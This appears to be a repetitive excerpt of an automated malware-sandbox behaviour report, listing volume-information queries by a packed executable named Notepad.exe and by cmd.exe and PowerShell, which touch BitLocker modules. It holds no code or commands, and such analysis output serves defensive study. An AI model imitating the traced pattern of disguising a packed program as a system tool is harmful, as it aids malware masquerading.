Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\activate.bat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
